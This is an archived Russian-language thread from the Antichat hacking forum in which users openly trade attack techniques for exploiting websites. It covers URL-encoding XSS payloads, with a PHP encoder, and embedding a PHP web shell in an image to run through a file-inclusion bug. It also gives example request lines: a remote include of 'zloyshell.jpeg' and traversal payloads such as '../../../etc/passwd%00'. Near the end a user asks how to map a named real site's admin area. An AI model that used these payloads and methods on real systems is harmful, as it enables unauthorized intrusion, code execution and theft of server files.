
18.07.2008, 10:21
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
С нами:
10187606
Репутация:
99
|
|
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%7 8%74%2F%6A
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.
|
|
|

18.07.2008, 11:04
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от schut123
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.
PHP код:
<?
if (!isset($_GET['a']))
{
die('?a=string');
}
$a = $_GET['a'];
$len = strlen($a);
$b = '';
for($i = 0; $i < $len; $i++)
{
$b = $b.'%'.dechex(ord($a[$i]));
}
echo $b."\r\n";
?>
|
|
|

18.07.2008, 10:37
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
вот держи сайт http://ha.ckers.org/xss.html там думаю разберешся в функциях
|
|
|

18.07.2008, 12:40
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
|
|
|

18.07.2008, 14:17
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Sharingan
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
|
|
|

18.07.2008, 15:10
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
С нами:
9457966
Репутация:
0
|
|
Сообщение от .Slip
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
1. Надо ли код картинки оставлять? или просто php код дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
4. как распознать удаленый инклуд от локального?
|
|
|

18.07.2008, 15:12
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Сообщение от 2la.painkiller
1. Надо ли код картинки оставлять? или просто php дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
1.
Сообщение от .Slip
после того что там уже изачально было
2. можно, если удаленный инклюд
3. зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос
include(/var/www/domain/vasya.ru/$page)
то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет  выше корня не уйдешь.
4. Пробуешь открыть скрипт, расположенный на др. сервере, если не открывает, то или отключено, или инклуд не удаленный.
Последний раз редактировалось n0ne; 18.07.2008 в 15:19..
|
|
|

18.07.2008, 15:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Каталоги помому ваще фигня -
можно сделать ../../../../../../../../../../etc/passwd или
../etc/passwd
и все равно выдаст тот же фаил, если он есть)
|
|
|

18.07.2008, 15:30
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Велемир
Каталоги помому ваще фигня -
можно сделать ../../../../../../../../../../etc/passwd или
../etc/passwd
и все равно выдаст тот же фаил, если он есть)
Бред написал. Т.е. по твоему будет одноxуйственно?
include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");
И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd? Не стоит писать херню
Последний раз редактировалось .Slip; 18.07.2008 в 15:33..
|
|
|

18.07.2008, 15:17
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
С нами:
9457966
Репутация:
0
|
|
спс всем! %)
а на счет админки http://www.mirf1.ru/
как или какими прогамми можно узнать строение сайта?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
|
|
|
|